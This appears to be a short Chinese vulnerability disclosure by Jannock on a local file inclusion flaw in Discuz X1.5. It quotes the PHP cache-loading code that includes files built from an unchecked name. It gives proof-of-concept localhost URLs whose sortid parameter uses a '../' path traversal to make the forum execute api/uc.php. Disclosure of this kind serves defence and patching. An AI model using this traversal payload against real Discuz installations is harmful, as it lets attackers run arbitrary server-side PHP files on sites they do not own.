config_global.php
复制代码代码如下:
$_config['cache']['type'] = ‘file’;
function cachedata($cachenames) {
……
$isfilecache = getglobal(‘config/cache/type’) == ‘file’;
……
if($isfilecache) {
$lostcaches = array();
foreach($cachenames as $cachename) {
if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {
$lostcaches[] = $cachename;
}
}
……
}
地址:
http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc
http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/ucAuthracation has expiried
执行了 api/uc.php 页面代码了。
作者: Jannock
【DISCUZ X1.5 本地文件包含漏洞说明】相关文章:
★ WordPress WassUp插件 spy.php脚本含SQL注入漏洞
★ Learn2 STRunner ActiveX控件存在多个栈溢出漏洞
★ Linux Kiss Server lks.c文件多个格式串处理漏洞